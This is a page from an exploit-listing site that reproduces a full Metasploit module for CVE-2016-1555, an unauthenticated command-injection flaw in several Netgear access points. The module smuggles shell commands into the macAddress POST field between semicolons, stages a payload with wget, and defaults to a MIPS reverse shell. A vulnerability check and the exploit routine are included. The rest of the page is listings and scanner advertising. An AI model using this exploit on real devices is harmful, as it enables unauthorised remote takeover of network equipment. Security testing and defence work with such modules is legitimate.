netgear devices (unauthenticated) remote command execution (metasploit)

▸▸▸ Exploit & Vulnerability >> remote exploit & hardware vulnerability

Online Vulnerability Scanner Tools

Code...

				
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Netgear Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
        From the CVE-2016-1555 page: (1) boardData102.php, (2) boardData103.php,
        (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in
        Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350,
        WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute
        arbitrary commands.
      },
      'Author'      =>
        [
          'Daming Dominic Chen <ddchen[at]cs.cmu.edu>', # Vuln discovery
          'Imran Dawoodjee <imrandawoodjee.infosec[at]gmail.com>' # MSF module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2016-1555'],
          ['URL', 'https://kb.netgear.com/30480/CVE-2016-1555-Notification?cid=wmt_netgear_organic'],
          ['PACKETSTORM', '135956'],
          ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/112']
        ],
      'DisclosureDate' => 'Feb 25 2016', # According to http://seclists.org/fulldisclosure/2016/Feb/112
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'Payload'        => {},
      'DefaultOptions' => {
        'CMDSTAGER::FLAVOR' => 'wget',
        'PAYLOAD'           => 'linux/mipsbe/shell_reverse_tcp',
        'WfsDelay'          => 10 },
      'Targets'        => [['Automatic', { }]],
      'CmdStagerFlavor'=> %w{ echo printf wget },
      'DefaultTarget'  => 0
      ))
      register_options(
      [
        OptString.new('TARGETURI', [true, 'Path of the vulnerable URI.', '/boardDataWW.php']), # boardDataWW.php
        OptString.new('MAC_ADDRESS', [true, 'MAC address to use (default: random)', Rex::Text.rand_text_hex(12)])
      ])
  end

  # check for vulnerability existence
  def check
    fingerprint = Rex::Text.rand_text_alpha(12) # If vulnerability is present, we will get this back in the response
    res = execute_command("echo #{fingerprint}") # the raw POST response

    unless res
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    unless res.code == 200
      return CheckCode::Safe
    end

    unless res.get_html_document.at('input').to_s.include? fingerprint
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  # execute a command, or simply send a POST request
  def execute_command(cmd, opts = {})
    vars_post = {
      'macAddress' => "#{datastore['MAC_ADDRESS']};#{cmd};",
      'reginfo' => '1',
      'writeData' => 'Submit'
    }

    send_request_cgi({
      'method'  => 'POST',
      'headers' => { 'Connection' => 'Keep-Alive' },
      'uri'     => normalize_uri(target_uri.path),
      'vars_post' => vars_post
    })
  rescue ::Rex::ConnectionError
    fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the target!")
  end

  # the exploit method
  def exploit
    #run a check before attempting to exploit
    unless [CheckCode::Vulnerable].include? check
      fail_with Failure::NotVulnerable, 'Target is most likely not vulnerable!'
    end

    execute_cmdstager(linemax: 2048) # maximum 130,000
  end

end

Netgear devices (unauthenticated) remote command execution (metasploit) Vulnerability / Exploit Source : Netgear devices (unauthenticated) remote command execution (metasploit)

Last Vulnerability or Exploits

▸ gitlab 14.9 - stored cross-site scripting (xss) ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ gitlab 14.9 - authentication bypass ◂

Discovered: 2022-04-26
Exploit: webapps
Vulnerability: ruby

▸ easeus data recovery - 'ensserver.exe' unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

▸ ptpublisher v2.3.4 - unquoted service path ◂

Discovered: 2022-04-19
Exploit: local
Vulnerability: windows

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Discover posible vulnerabilities before GO LIVE with your project
Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Do an audit to find and close the high risk issues before having a real damage and increase the costs
Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Bypass your network restrictions and scan from our IP for relevant results
Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Scan your website from any device with internet connection

Tusted by

Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.